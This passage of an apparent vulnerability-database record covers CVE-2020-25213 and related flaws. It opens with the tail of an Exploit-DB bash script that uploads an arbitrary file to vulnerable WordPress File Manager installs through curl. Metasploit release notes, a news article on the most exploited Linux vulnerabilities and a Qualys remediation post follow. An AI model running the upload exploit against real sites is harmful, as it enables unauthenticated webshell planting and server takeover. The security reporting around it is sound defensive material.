\\\"$target_endpoint\\\" \"\r\n\t\techo\r\n\tfi\r\n\r\n\tresponse=$(curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" \\\r\n\t\t-F \"upload[]=@/$file_upload\" \\\r\n\t\t\"$target_endpoint\" )\r\n #echo \"$response\"\r\n file_upload_url=$(echo \"$response\" | jq -r .added[0].url 2>/dev/null)\r\n\t[[ -n \"$file_upload_url\" ]] && echo -e \"[+] W00t! W00t! File uploaded successfully.\\nLocation: $file_upload_url \"\r\n\t[[ -z \"$file_upload_url\" ]] && echo \"[-] File upload failed.\"\r\n}\t\r\n\r\n\r\n[[ \"$check\" == \"true\" ]] && checkWPFileManager \"$wp_url\"\r\n[[ -s \"$upload_file\" ]] && exploitWPFileManager \"$wp_url\" \"$upload_file\" \"$verbose\"\r\n\r\necho", "sourceHref": "https://www.exploit-db.com/download/49178", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-11-13T20:46:22", "description": "## SaltStack RCE\n\n\n\n[wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14379>) that targets SaltStack\u2019s Salt software. Specifically, the module exploits both an authentication bypass (CVE-2020-25592) and a command injection vulnerability (CVE-2020-16846) in SaltStack\u2019s REST API to get code execution as `root` through Salt\u2019s SSH client on infected versions. You can read more about the vulns [on AttackerKB](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution?referrer=wrapup#rapid7-analysis>).\n\n## Hack Metasploit with Metasploit\n\n[justinsteven](<https://github.com/justinsteven>) both discovered a vulnerability (CVE-2020-7384) in and added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14331>) for Metasploit\u2019s `msfvenom` utility. 
`msfvenom` allows users to inject a payload into custom APK templates; however, `msfvenom` does not sanitize certain fields, such as the `Owner` field, that get passed into an `Open3.popen3()` call. Because of this, an unsuspecting user of `msfvenom` might use a malicious template and subsequently give an attacker a shell on the user\u2019s computer. This issue has been fixed in Metasploit\u2019s `6.0.12` release and Metasploit Pro\u2019s `4.19.0` release.\n\n## WordPress File Manager RCE\n\n[ide0x90](<https://github.com/ide0x90>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14253>) that targets various versions of a popular WordPress plugin, `WordPress File Manager`. The vulnerability (CVE-2020-25213) is due to a leftover example file that enables unauthenticated execution of a set of commands. One of those commands is an `upload` command, which makes uploading a PHP webshell and getting code execution effortless.\n\n## Apache Zookeeper Info Disclosure\n\n[juushya](<https://github.com/juushya>) added an auxiliary [module](<https://github.com/rapid7/metasploit-framework/pull/14269>) that obtains useful information such as IPs of connected clients, server OS information and statistics, and log files from Apache Zookeeper instances.\n\n## New modules (4)\n\n * [SaltStack Salt REST API Arbitrary Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14379>) by wvu and KPC, which exploits [CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection?referrer=wrapup#rapid7-analysis>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\n * [WordPress File Manager Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14253>) by Alex Souza (w4fz5uck5) and Imran E. 
Dawoodjee, which exploits [CVE-2020-25213](<https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213>)\n * [Rapid7 Metasploit Framework msfvenom APK Template Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14331>) by Justin Steven, which exploits [CVE-2020-7384](<https://attackerkb.com/topics/MmrdI6rWUn/cve-2020-7384>)\n * [Apache ZooKeeper Information Disclosure](<https://github.com/rapid7/metasploit-framework/pull/14269>) by Karn Ganeshen\n\n## Enhancements and features\n\n * PR [#14387](<https://github.com/rapid7/metasploit-framework/pull/14387>) by [adfoster-r7](<https://github.com/adfoster-r7>) added a check to ensure that uses of `AutoCheck` are always prepended as opposed to included in modules.\n * PR [#14373](<https://github.com/rapid7/metasploit-framework/pull/14373>) by [dwelch-r7](<https://github.com/dwelch-r7>) removed the unused Netware console session type from Framework.\n * PR [#14371](<https://github.com/rapid7/metasploit-framework/pull/14371>) by [h00die](<https://github.com/h00die>) added vulnerable version information to the `auxiliary/scanner/http/drupal_views_user_enum` module.\n * PR [#14353](<https://github.com/rapid7/metasploit-framework/pull/14353>) by [agalway-r7](<https://github.com/agalway-r7>) modified the `msfdb` command to show more readable and informative output to the user.\n\n## Bugs fixed\n\n * PR [#14304](<https://github.com/rapid7/metasploit-framework/pull/14304>) by [b4rtik](<https://github.com/b4rtik>) updated the `post/windows/manage/execute_dotnet_assembly` module to be able to handle additional function signatures of the code that will be injected into.\n * PR [#14382](<https://github.com/rapid7/metasploit-framework/pull/14382>) from [h00die](<https://github.com/h00die>) fixed a crash in the `auxiliary/analyze/apply_pot` module caused by an out-of-date symbol name.\n * PR [#14378](<https://github.com/rapid7/metasploit-framework/pull/14378>) by [adfoster-r7](<https://github.com/adfoster-r7>) added 
proper synchronization to the job status tracker that is used by Metasploit\u2019s RPC service.\n * PR [#14370](<https://github.com/rapid7/metasploit-framework/pull/14370>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) fixed a crash in `msfconsole`\u2019s `generate` command caused by attempting to tab complete input with no results.\n * PR [#14363](<https://github.com/rapid7/metasploit-framework/pull/14363>) by [zeroSteiner](<https://github.com/zeroSteiner>) fixed an issue in the `auxiliary/scanner/smb/smb_login` module that reported false negatives for valid credentials when `msfconsole` was started with `bundle exec` preceding the command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-11-05T10%3A12%3A21-06%3A00..2020-11-12T16%3A18%3A40%2B00%3A00%22>)\n * [Full diff 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/compare/6.0.15...6.0.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-11-13T19:08:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16846", "CVE-2020-25213", "CVE-2020-25592", "CVE-2020-7384"], "modified": "2020-11-13T19:08:01", "id": "RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7", "href": "https://blog.rapid7.com/2020/11/13/metasploit-wrap-up-87/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time 
period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * 
[**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository have been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited 
vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. 
CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d. This will be an ongoing effort, as CISA frequently amends the catalog with the latest CVEs as part of its regular feeds.\n\nFor these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. 
Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities listed by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help them comply with the directive\u2019s aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
